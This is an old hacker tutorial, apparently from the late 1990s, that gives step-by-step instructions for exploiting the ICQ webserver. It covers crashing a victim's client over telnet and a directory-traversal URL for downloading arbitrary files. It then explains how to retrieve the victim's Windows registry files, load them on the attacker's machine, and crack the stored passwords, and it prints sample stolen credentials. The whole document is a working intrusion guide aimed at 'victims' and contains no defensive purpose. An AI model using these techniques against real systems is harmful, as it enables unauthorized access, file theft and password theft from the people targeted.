ICQ Homepage Exploit By Shadow51 Ever wondered why there is a little house beside the name of some people? That doesn't mean they are at home, it means they have the ICQ-Webserver running. The idiots who made it left huge bugs in it, like you can close their ICQ remotely, and even download their files. The only problem is that you can't see the files, so you have to know what you're downloading. To close the ICQ client: 1. Click on the start button 2. Click on RUN 3. Type Telnet 123.123.123.123 80 Of course replace the 123.123.123.123 by the IP of the victim (note that this bug only works on build 1700 and maybe a few others but I'm not sure). 4. Press ENTER Wait until it connects 5. Type QUIT Wait about 10 seconds. If they go offline that means it worked, if not, then it didn't work. Now suppose you want to get some of their files. Lets say that you want to see the file c:\windows\win.ini, and he or she has the ICQ-Webserver on: 1. Go to your browser 2. Type http://123.123.123.123/.html/......../windows/win.ini note that you need the /.html/ part. It will trick the server into believing it's a html file, and note that there are 8 dots /......../ (that means it goes back 4 dirs if the users ICQ dir is not in a standard place. It can cause problems, but 95% of the time it's in c:\progra~1\icq\ 3. press ENTER in your browser It will simply ask you where you want to save the file the you save it and do what ever you want with it. Now this is not all you can do. There are much better things with this exploit, like getting the user's password files and registry. If you are a lamer, I suggest you go and play with what you just learned, and stop reading now cause this is a bit too complicated for you :P. Okay, so you want to have the registry and all the passes. Okay, before you do this, I warn you that if the user your hacking is not using the same version of Windows you are using, you could end up with a lot of problems. Suppose you have Win98, and they have win95, and it wont work. An easy way to make sure it's the same version is to download their command.com with the exploit, and compare the size with your command.com. There are many other ways, but this is a good one. 1. Get 2 files http://123.123.123.123/.html/......../windows/user.dat and http://123.123.123.123/.html/......../windows/system.dat Remember to change the IP when your done. 2. Copy them in a directory. 3. Make a backup copy of you c:\windows\user.dat and c:\windows\system.dat You're gonna want to have them back when you're done. 4. Restart your computer 5. Press F8 just before it boots up 6. Choose "Command Prompt Only" 7. Delete your current user.dat and system.dat and replace them with the ones from the guy you hacked 8. Reboot your computer 9. Just before it boots, press F8 several times; choose safe mode. 10. Once booted in safe mode, click on start 11. Click on RUN 12. Type regedit 13. Press ENTER 14. Once in Regedit, click on the menu "Registry", then choose "Export Registry File..." 15. Save the file, then get yourself a Password Cracker 16. If all goes well, you now have all the users passwords. It should look something like this: crypt_Blizzard_Storm : öA@N www.mircosoft.com : Administration:PASSWORD *Rna\Dan\dannyk : q34ad6gt *Rna\Test\957935 : nar8s7yj *Rna\Test2\wolves : cyal8r *Rna\Test3\curtisph : q73vnrht *Rna\My Connection\USERNAME : PASSWORD *Rna\My Connection 3\USERNAME : PASSWORD 17. Reboot 18. Press F8 at startup 19. Choose "Command Prompt Only" 20. Replace user.dat and system.dat with your originals that you previously had backed up Shadow51 29000000 Shadow51@writeme.com